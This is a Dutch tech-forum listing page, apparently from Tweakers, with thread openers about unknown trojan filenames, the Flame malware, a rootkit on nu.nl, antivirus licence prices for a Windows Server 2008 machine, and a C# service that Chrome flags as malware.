Ik zoek de Malware/Virus-namen en bijbehorende descriptions van de volgende filenames, om erachter te komen wat ze gedaan kunnen hebben:~!#8007.tmp (Trojan) tempfiles.exe (Trojan) installer_hair_pro.exe (Malware)

"Stuxnet-opvolger Flame schokt securitywereld"

30-05-2012 discussie 2
Ik weet niet zo goed waar ik dit moet plaatsen maar lijkt mij het meest relevant in dit sub-forum.
"De securitywereld is opgeschrikt door nieuwe supermalware, Flame gedoopt. Deze malware à la het beruchte Stuxnet waart naar schatting al vijf tot acht jaar rond, geheel ongezien."

bron

Het schokt mij redelijk dat een virus van dergelijk kaliber zolang ongemerkt blijft.

is er al oplossing nu.nl rootkit zien en verwijderen?

15-03-2012 discussie 3
Ik heb nu.nl gister bezocht ben je alleen besmet als je hebt ingelogt of ook bezocht?

[W2K8] Wat voor virusscanner?

17-08-2011 discussie 26
Probleempje: ik heb sinds kort een lichtgewicht Windows Server 2008 R2 systeempje staan (Atom 330 CPU, voor mij sterk genoeg) en wil een goede antivirus hebben.

Qua antivirus voor gebruik op non-server besturingssystemen is er keus genoeg -- gratis zijn er velen en de commerciële versies zijn vaak aantrekkelijk geprijst. Maar ja, deze installeren geen van allen op een server OS.

En dan wordt het dus lastig. Ik moet dan gaan kiezen uit zakelijke antivirus-programma's (of pakketten omdat die bundels vaak wat goedkoper zijn). Moeilijke keuze, zeker qua aantal licenties. Ik heb dus een servertje en daarnaast drie computers (twee desktop computers en een laptopje), dus inclusief de server vier licenties.

Een vergelijking van wat ik heb gevonden:

Avast
Enkel de Server Edition: ¤427,21 voor een jaar
De Standard Suite omvat ook beveiliging voor werkstations, maar je moet minimaal tien licenties afnemen en je komt dan op ¤451,61 voor een jaar

AVG
File Server Edition met drie verbindingen: ¤57,95 voor een jaar
Business Edition met drie computers: ¤128,95 voor een jaar

Avira
Antivir Server met tien verbindingen (minder kan niet): ¤285,59 voor een jaar
Antivir Network Bundle met vijf verbindingen: ¤204,69 voor een jaar

Kaspersky
Anti-Virus for Fileserver: ¤345,10 voor een jaar
Small Office Security (1 fileserver, 5 werkstations): ¤249 voor een jaar

NOD32
(prijzen alleen op aanvraag dus geen info beschikbaar)

McAfee
Total Protection Service met vier licenties (1 server, 3 werkstations): ¤130,60 voor een jaar

Symantec
Endpoint Protection 12.0 Small Business Edition (business pack, 5 gebruikers): ¤276,38 voor een jaar


Moeilijk om te kiezen, zeker omdat ik uit deze lijst alleen persoonlijke ervaring heb met Avast en Kaspersky. De laatste gebruik ik momenteel op m'n eigen PC.

AVG Valt op door de lage prijs. Dat verschil moet toch ergens vandaan komen?

Heeft er iemand ervaring met één van bovenstaande pakketten? Voordelen/nadelen? Is het lichtgewicht? Er zijn wel links en rechts ervaringen op Google maar daar werd ik niet veel wijzer van en praktijkinfo van medetweakers valt altijd beter

-- Edit: nav ervaringen (zie verderop in dit topic) voeg ik even toe, dat bovenstaande virusscanner hoogstwaarschijnlijk allemaal te uitgebreid zijn aangezien ik gewoon een virusscanner wil, niet meer en niet minder. Dus geen reporting of verbindingen met clientsystemen, gewoon een virusscanner à la Avast of Kaspersky die ook op een server wil installeren. En dan gaan bovenstaande waarschijnlijk allemaal veel te ver helaas.

[C#] Chrome zegt dat mijn service malware is

01-04-2011 discussie 1
Ik heb recentelijk een Windows service gemaakt met C#/.NET 4.0. Deze verzamelt automatisch op gezette tijden informatie van andere (eigen) servers en voorziet tevens in rapporten naar een webapplicatie (Silverlight).

Als ik met Chrome naar de Silverlight applicatie ga, die vervolgens contact zoekt met mijn service, dan krijg ik de volgende melding:

Waarschuwing: hier klopt iets niet!
www.domein.nl bevat inhoud van server.domein.tld, een site waarvan bekend is dat deze malware distribueert. Als u deze site bezoekt, kan uw computer worden geïnfecteerd.

Voorheen zat de inhoud van een service in een losse applicatie, en toen verscheen deze melding niet.

Waar komt dit vandaan? De server is verder schoon.
Resultaten per pagina: 25 | 50 | 100


Samsung Galaxy S7 edge Athom Homey Xcom 2 Samsung Galaxy S7 Fallout 4 Apple iPhone 6C Hitman (2016) LG G5

© 1998 - 2016 de Persgroep Online Services B.V. Tweakers vormt samen met o.a. Autotrack en Carsom.nl de Persgroep Online Services B.V. Hosting door True